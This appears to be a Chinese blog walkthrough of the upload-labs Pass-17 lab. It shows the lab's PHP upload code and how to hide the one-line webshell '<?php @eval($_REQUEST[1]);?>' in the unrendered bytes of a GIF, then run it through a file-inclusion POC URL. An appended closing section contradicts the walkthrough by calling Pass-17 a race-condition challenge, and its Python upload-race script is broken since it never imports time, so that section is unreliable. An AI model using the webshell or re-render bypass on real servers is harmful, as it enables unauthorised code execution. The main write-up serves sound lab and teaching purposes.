【网络安全】upload-labs Pass-17 解题详析

博客围绕Upload-Labs靶场攻防实战展开,介绍了Antsword蚁剑工具的使用参考资料。还阐述利用后端逻辑代码特性,通过二次渲染图片数据的特点,插入一句话木马,结合靶场文件包含漏洞实现命令执行,给出了详细操作步骤。

【精选优质专栏推荐】


每个专栏均配有案例与图文讲解,循序渐进,适合新手与进阶学习者,欢迎订阅。

文章目录

Antsword蚁剑

蚁剑工具的使用可参考:

【网络安全】AntSword(蚁剑)实战解题详析(入门)

【网络安全】DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集

正文

后端逻辑代码:

<?php
include '../config.php';
include '../head.php';
include '../menu.php';

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}
?>

<div id="upload_panel">
    <ol>
        <li>
            <h3>任务</h3>
            <p>上传<code>图片马</code>到服务器。</p>
            <p>注意:</p>
            <p>1.保证上传后的图片马中仍然包含完整的<code>一句话</code><code>webshell</code>代码。</p>
            <p>2.使用<a href="<?php echo INC_VUL_PATH;?>" target="_bank">文件包含漏洞</a>能运行图片马中的恶意代码。</p>
            <p>3.图片马要<code>.jpg</code>,<code>.png</code>,<code>.gif</code>三种后缀都上传成功才算过关!</p>
        </li>
        <li>
            <h3>上传区</h3>
            <form enctype="multipart/form-data" method="post">
                <p>请选择要上传的图片:<p>
                <input class="input_file" type="file" name="upload_file"/>
                <input class="button" type="submit" name="submit" value="上传"/>
            </form>
            <div id="msg">
                <?php 
                    if($msg != null){
                        echo "提示:".$msg;
                    }
                ?>
            </div>
            <div id="img">
                <?php
                    if($is_upload){
                        echo '<img src="'.$img_path.'" width="250px" />';
                    }
                ?>
            </div>
        </li>
        <?php 
            if($_GET['action'] == "show_code"){
                include 'show_code.php';
            }
        ?>
    </ol>
</div>

<?php
include '../footer.php';
?>

imagecreatefrompng是PHP中的一个函数,用于创建一个新的图像资源对象,并从PNG格式的图像文件中读取数据

由于二次渲染后图片中的部分数据会被修改,即(A,B,C)可能会被修改为(A,D,E),那么对于此限制,我们可以找到不被修改的A ,因为它不被过滤,因此我们将A修改为注入语句,此时语句不会被过滤,从而达到命令执行的目的。

我们先下载一个gif图像,使用Hxd编辑器可得到其图像数据:

在这里插入图片描述

HxD Hex Editor 工具的安装使用链接:HxD工具使用说明详细教程 | 优快云@秋说

接着上传该gif,得到二次渲染后的图像:

在这里插入图片描述

接着将该图像另存为8479.gif,使用Hxd编辑器查看:

在这里插入图片描述

可以看到自00000190后,数据被二次渲染,也就是说在该行之前的数据是不会被渲染的。

于是我们插入一句话木马:

<?php @eval($_REQUEST[1]);?>

在这里插入图片描述

保存修改:

在这里插入图片描述

接着重新上传该gif:

在这里插入图片描述

找到该文件路径:

在这里插入图片描述

由于靶场存在文件包含漏洞,于是我们可以利用文件包含实命令执行:

在这里插入图片描述

POC:

http://localhost/upload-labs-master/include.php?file=upload/11078.gif&1=phpinfo();

命令执行成功:

在这里插入图片描述

### 关于Upload-Labs Pass-17 的分Upload-Labs 中,Pass-17 主要涉及白名单机制下的资源竞争漏洞[^3]。此关卡设计用于测试上传文件过程中可能存在的竞态条件(race condition),即两个操作依赖相同的资源但在不同时间发生。 #### 资源竞争概述 当服务器处理文件上传请求时,在验证文件合法性与实际保存之间存在短暂的时间窗口。攻击者可以利用这段时间差替换合法文件为恶意脚本,从而绕过安全检测。 #### 实现细节 为了成功完成这一挑战,通常需要满足以下几个要素: - **快速响应**:确保客户端能够迅速发送第二个HTTP请求以覆盖原始上传文件。 - **同步控制**:精确把握两次请求之间的时机,使第二次请求恰好发生在第一次请求被接受但还未完全处理完毕之时。 下面是一个简单的Python脚本示例,展示了如何模拟这种攻击行为: ```python import requests from threading import Thread def upload_file(file_path, url): files = {'file': open(file_path,'rb')} r = requests.post(url,files=files) if __name__ == "__main__": target_url = 'http://your-target-url.com/upload' # 启动线程执行正常图片上传 t1 = Thread(target=upload_file,args=('normal_image.jpg',target_url)) t1.start() # 稍作延迟后启动另一个线程尝试覆盖原文件 time.sleep(0.5) t2 = Thread(target=upload_file,args=('malicious.php',target_url)) t2.start() t1.join() t2.join() ``` 上述代码片段仅作为学习目的展示,并不应应用于非法用途。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值